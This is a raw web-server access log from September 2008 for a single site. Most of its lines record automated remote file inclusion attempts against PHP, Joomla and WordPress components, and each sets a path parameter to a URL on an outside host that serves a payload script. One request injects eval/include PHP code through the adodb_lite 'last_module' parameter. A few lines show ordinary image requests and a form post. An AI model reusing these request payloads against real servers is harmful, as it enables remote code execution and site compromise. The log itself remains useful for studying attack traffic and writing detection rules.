87.226.77.5 - - [12/Sep/2008:10:15:45 -0700] "GET /logs/access_080226.log/error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:15:57 -0700] "GET /index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89397 "-" "libwww-perl/5.810" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:16:04 -0700] "GET /logs/access_080525.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:16:05 -0700] "GET /logs/access_080807.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:05 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:06 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:07 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:10:16:08 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:16:09 -0700] "GET /logs/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:16:09 -0700] "GET /logs/access_080723.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:16:09 -0700] "GET /errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:16:10 -0700] "GET /logs/access_080725.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:13 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:13 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:14 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:15 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:15 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:16 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:16 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:16:18 -0700] "GET /logs/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:16:18 -0700] "GET /logs/access_080723.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:16:18 -0700] "GET /errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:16:18 -0700] "GET /logs/access_080725.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:19 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:19 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:21 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:22 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:10:16:22 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:16:26 -0700] "GET /logs/access_080723.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:16:26 -0700] "GET /logs/access_080725.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:16:27 -0700] "GET /logs/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:16:32 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [12/Sep/2008:10:16:48 -0700] "GET /errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:16:53 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:16:53 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:16:54 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:16:54 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:10:16:57 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:17:25 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:17:25 -0700] "GET /logs//citywriter/head.php?path=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:17:25 -0700] "GET /logs/access_080512.log//citywriter/head.php?path=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:10:17:25 -0700] "GET //citywriter/head.php?path=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:10:18:08 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:10:18:08 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:18:14 -0700] "GET /errors.php?error=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
200.93.147.155 - - [12/Sep/2008:10:18:16 -0700] "GET /logs/errors.php?error=http://phase-lm.co.uk/language/joomla?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:18:38 -0700] "GET /logs/access_080401.log//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:18:38 -0700] "GET /logs//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:18:40 -0700] "GET //index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 200 89369 "-" "libwww-perl/5.811" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:18:59 -0700] "GET /logs/access_080421.log/config/dbutil.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:19:05 -0700] "GET /config/dbutil.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:19:07 -0700] "GET /logs/config/dbutil.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:10:19:23 -0700] "GET /logs/access_080623.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jisu.ms.kr/data/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:10:19:25 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jisu.ms.kr/data/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [12/Sep/2008:10:19:26 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.jisu.ms.kr/data/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.241 - - [12/Sep/2008:10:19:31 -0700] "GET /logs/access_080321.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:19:36 -0700] "GET /logs/access_080302.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.139.17.157 - - [12/Sep/2008:10:19:50 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.139.17.157 - - [12/Sep/2008:10:19:50 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.139.17.157 - - [12/Sep/2008:10:19:51 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.139.17.157 - - [12/Sep/2008:10:19:51 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:20:13 -0700] "GET /logs/access_080723.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:20:13 -0700] "GET /logs/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:20:13 -0700] "GET /errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [12/Sep/2008:10:20:14 -0700] "GET /logs/access_080725.log/errors.php?error=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:20:31 -0700] "GET /logs/access_080326.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:20:33 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:20:34 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:20:38 -0700] "GET /logs//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:20:38 -0700] "GET //admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:20:44 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:21:01 -0700] "GET /phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:21:02 -0700] "GET /logs/access_080527.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:21:02 -0700] "GET /logs/access_080817.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:21:04 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:21:05 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:21:09 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:21:09 -0700] "GET /logs/access_080508.log/SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.141 - - [12/Sep/2008:10:21:09 -0700] "GET /SQuery/lib/gore.php?libpath=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:21:10 -0700] "GET /logs/access_080710.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:21:11 -0700] "GET /logs/access_080826.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:21:11 -0700] "GET /logs/access_080604.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:21:17 -0700] "GET /logs/access_080521.log//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:21:19 -0700] "GET /logs/access_080521.log//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:21:28 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:21:28 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:21:29 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:21:35 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:21:49 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:21:50 -0700] "GET //?path%5Bdocroot%5D=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 200 89244 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:21:51 -0700] "GET //admin.php?include_path=http://h1.ripway.com/copilot/files/gambar.dat? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:21:58 -0700] "GET /logs/access_080109.log/template.php?CONFIG[main_path]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:22:00 -0700] "GET /template.php?CONFIG[main_path]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:22:02 -0700] "GET /logs/template.php?CONFIG[main_path]=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:22:03 -0700] "GET /logs/access_080705.log/config/dbutil.php?confdir=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:22:07 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:22:07 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:22:07 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:10:22:16 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:10:22:31 -0700] "GET /logs/access_080527.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:22:43 -0700] "GET /logs//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:22:44 -0700] "GET /logs/access_080329.log//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:22:44 -0700] "GET //index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 200 89369 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:22:51 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:22:52 -0700] "GET /phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [12/Sep/2008:10:22:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.232.250 - warboard [12/Sep/2008:10:22:53 -0700] "POST /warboard/index.php?table_name=warboard_main&page=0&function=insert HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [12/Sep/2008:10:22:53 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc HTTP/1.1" 200 33096 "http://www.dmulk.com/warboard/index.php?function=show_insert_form&table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
